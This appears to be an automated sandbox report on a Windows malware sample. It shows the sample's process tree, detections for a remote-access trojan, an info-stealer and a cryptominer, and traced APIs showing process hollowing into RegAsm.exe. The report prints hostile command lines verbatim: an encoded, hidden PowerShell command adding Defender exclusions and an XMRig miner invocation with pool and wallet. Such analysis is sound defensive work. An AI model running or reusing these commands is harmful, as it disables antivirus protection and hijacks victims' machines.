2024-09-19 00:26:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-19 00:26:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	20:25:05
Start date:	18/09/2024
Path:	C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe"
Imagebase:	0x260000
File size:	1'319'800 bytes
MD5 hash:	8199C105289D70AF5446C7FD64496D7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:25:05
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	20:25:06
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:25:07
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\HPd7I3vQri.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\HPd7I3vQri.exe"
Imagebase:	0x630000
File size:	352'768 bytes
MD5 hash:	C164ED9887BD51CBA150379514DC4E81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000004.00000002.4729715116.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs Detection: 62%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:25:07
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\yTRfYxWiym.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\yTRfYxWiym.exe"
Imagebase:	0x2eaccd70000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2193885357.000002EACD240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2198386287.000002EADF275000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000005.00000002.2204489074.000002EAE7913000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2194703677.000002EACED41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:25:12
Start date:	18/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	20:25:12
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:25:12
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x10e79b40000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2265321541.0000010E10535000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2247370156.0000010E00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:25:14
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x208f2e70000
File size:	55'824 bytes
MD5 hash:	DF5419B32657D2896514B6A1D041FE08
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000002.4690508162.00000208919A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.4690508162.0000020890FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000009.00000002.4690508162.000002089147A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	20:25:18
Start date:	18/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:25:26
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Imagebase:	0x19118960000
File size:	42'800 bytes
MD5 hash:	929EA1AF28AFEA2A3311FD4297425C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2354734998.000000014079A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000000E.00000002.2354734998.0000000140465000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000E.00000002.2354734998.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:25:26
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Imagebase:	0x2dfc7ea0000
File size:	42'800 bytes
MD5 hash:	929EA1AF28AFEA2A3311FD4297425C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.4611056195.000002DFC8099000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.4611056195.000002DFC8038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	20:25:35
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Imagebase:	0x2d61b4e0000
File size:	729'600 bytes
MD5 hash:	FD3AD0AE7FE1BBEE4B2F2BD43A359393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2757993264.000002D61D261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2765446003.000002D62D795000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2765446003.000002D62D58D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2757993264.000002D61D372000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2765446003.000002D62D3B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000010.00000002.2765446003.000002D62D565000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:25:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\CfpeAm3lJAky.bat" "
Imagebase:	0xcc0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:25:57
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7934f0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	20:25:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x7ff799c70000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	20:25:57
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 localhost
Imagebase:	0xd00000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	20:26:01
Start date:	18/09/2024
Path:	C:\Users\user\AppData\Roaming\l6E.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\l6E.exe"
Imagebase:	0xb30000
File size:	354'168 bytes
MD5 hash:	FAC2188E4A28A0CF32BF4417D797B0F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 29%, ReversingLabs Detection: 54%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:26:01
Start date:	18/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:26:03
Start date:	18/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7e0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:26:05
Start date:	18/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:26:05
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4800 -ip 4800
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	20:26:05
Start date:	18/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1780
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	39.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	34.4%
Total number of Nodes:	32
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0270216D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,027020DF,027020CF), ref: 027022DC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027022EF
Wow64GetThreadContext.KERNEL32(00000398,00000000), ref: 0270230D
ReadProcessMemory.KERNELBASE(0000039C,?,02702123,00000004,00000000), ref: 02702331
VirtualAllocEx.KERNELBASE(0000039C,?,?,00003000,00000040), ref: 0270235C
WriteProcessMemory.KERNELBASE(0000039C,00000000,?,?,00000000,?), ref: 027023B4
WriteProcessMemory.KERNELBASE(0000039C,00400000,?,?,00000000,?,00000028), ref: 027023FF
WriteProcessMemory.KERNELBASE(0000039C,?,?,00000004,00000000), ref: 0270243D
Wow64SetThreadContext.KERNEL32(00000398,04B50000), ref: 02702479
ResumeThread.KERNELBASE(00000398), ref: 02702488

Strings

ReadProcessMemory, xrefs: 0270225A
aryA, xrefs: 027021B3
ResumeThread, xrefs: 027022A9
SetThreadContext, xrefs: 02702293
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 027022DB
WriteProcessMemory, xrefs: 02702280
GetP, xrefs: 027021EF
VirtualAlloc, xrefs: 02702234
CreateProcessA, xrefs: 02702221
ress, xrefs: 027021F7
VirtualAllocEx, xrefs: 0270226D
Load, xrefs: 027021AB
TerminateProcess, xrefs: 0270236B
GetThreadContext, xrefs: 02702247

Memory Dump Source

Source File: 00000000.00000002.2156876830.0000000002701000.00000040.00000800.00020000.00000000.sdmp, Offset: 02701000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2701000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 9005c4fe34bd3ddff459394d2269c2d82f6c9bee5940aa4a80aa1cae16d4e55f
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 3DB1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB342D774FA41CB94

Function 009E0B8F Relevance: 1.8, APIs: 1, Instructions: 293
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03703590,027024D8,?,00000064,?,?,?,?,03703590,?,?,009E0A34,00000064,00000040), ref: 009E0F31

Memory Dump Source

Source File: 00000000.00000002.2156399324.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e829edab36a5fcb1ce5f031ea179d10584e7b0fdcec05ffa6392a0f413527845
Instruction ID: 220df87f85f5f10c847168f92219e6bf0c0655e1669d309f4cd149a0a7cbaf72
Opcode Fuzzy Hash: e829edab36a5fcb1ce5f031ea179d10584e7b0fdcec05ffa6392a0f413527845
Instruction Fuzzy Hash: FEB17371A042999FCB01CFA9C480ADDFBF2BF88314F248569D855F7245C7B4AD81CBA4

Function 009E0500 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03703590,027024D8,?,00000064,?,?,?,?,03703590,?,?,009E0A34,00000064,00000040), ref: 009E0F31

Memory Dump Source

Source File: 00000000.00000002.2156399324.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6931d8687b7272224f45b349bf117008de42814aadfd5331a3307e6eb4c56e9e
Instruction ID: 6b86cf0e13eccc54d1b01548f9e179123ebc47ad4a3716c8cfe35ef58a7ba8d0
Opcode Fuzzy Hash: 6931d8687b7272224f45b349bf117008de42814aadfd5331a3307e6eb4c56e9e
Instruction Fuzzy Hash: 7D21E0B5D01259AFCB10DF9AC884ADEFBB4FF48710F10812AE918A7200C3B4A954CFA1

Function 0097D006 Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2156319186.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed0926d8de837b9f30fd225841e7b358263cab3281dd7d028ef0d6d048c3ce9e
Instruction ID: 8f88201c308155c45a8597be791207119f5130a8a53fd991d8c39dfc3317184c
Opcode Fuzzy Hash: ed0926d8de837b9f30fd225841e7b358263cab3281dd7d028ef0d6d048c3ce9e
Instruction Fuzzy Hash: 3B01007250E3C05ED7128B258C94756BFB89F53624F1DC1DBD9888F1E3C2695849C772

Function 0097D01D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2156319186.000000000097D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0097D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_97d000_PT54FFSL7ET46RASB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e158fe0cf76a2df5af502de799bf54429ecd7e61c2f94f4447b755927dd8a3f
Instruction ID: 87418d5a94475d611f0b9f57a40c32114fdbfb14502740b2a81300f7236afa10
Opcode Fuzzy Hash: 2e158fe0cf76a2df5af502de799bf54429ecd7e61c2f94f4447b755927dd8a3f
Instruction Fuzzy Hash: 1901F27240A340DAEB108E25C980B67BFACEF81324F18D41AED0C5A292C7B99941CAB1

Analysis Process: RegAsm.exePID: 6184, Parent PID: 5712COMMON

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 0041FEAF Relevance: 13.8, APIs: 9, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041FB65: CreateFileW.KERNELBASE(?,00000000,?,0041FF58,?,?,00000000,?,0041FF58,?,0000000C), ref: 0041FB82

GetLastError.KERNEL32 ref: 0041FFC3
__dosmaperr.LIBCMT ref: 0041FFCA
GetFileType.KERNELBASE(00000000), ref: 0041FFD6
GetLastError.KERNEL32 ref: 0041FFE0
__dosmaperr.LIBCMT ref: 0041FFE9
CloseHandle.KERNEL32(00000000), ref: 00420009
CloseHandle.KERNEL32(?), ref: 00420156
GetLastError.KERNEL32 ref: 00420188
__dosmaperr.LIBCMT ref: 0042018F

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction ID: c043dc6610800097a8c7d9f7805d75e01504a092e95ab29a96a2aa982ce353c5
Opcode Fuzzy Hash: 87ef763bbd003f1d2de960a3db6ca709dde3cd444b7d1b6f895e6fd8deb0075d
Instruction Fuzzy Hash: FCA14732A041559FCF19DF28EC91BAE3BA1AB46314F18016EF801EB3D2C7398957D759

Function 004038C0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 401
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 0040390A

Strings

shell32.dll, xrefs: 00403905
open, xrefs: 00403E04, 00403E25
.exe, xrefs: 004039E4, 004039F5, 00403C28, 00403C39

Memory Dump Source

Source File: 00000003.00000002.2162486709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: .exe$open$shell32.dll
API String ID: 1029625771-3690275032
Opcode ID: 5fe2b311168ee18d35339af2a02642367244109c8334c18b3b10726bc25dbb19
Instruction ID: 088f1b5ea99a5cdeca3a362f7bf00bb5554626ca33ca4133f18bdeb2bd32dcca
Opcode Fuzzy Hash: 5fe2b311168ee18d35339af2a02642367244109c8334c18b3b10726bc25dbb19
Instruction Fuzzy Hash: 5DE12A312083409BE718CF28C845B6FBBE5BF85305F24462DF489AB2D2D779E6458B5A

Function 00411432 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0041142C,00000016,0040BD98,?,?,82DB3677,0040BD98,?), ref: 00411443
TerminateProcess.KERNEL32(00000000,?,0041142C,00000016,0040BD98,?,?,82DB3677,0040BD98,?), ref: 0041144A
ExitProcess.KERNEL32 ref: 0041145C

Memory Dump Source

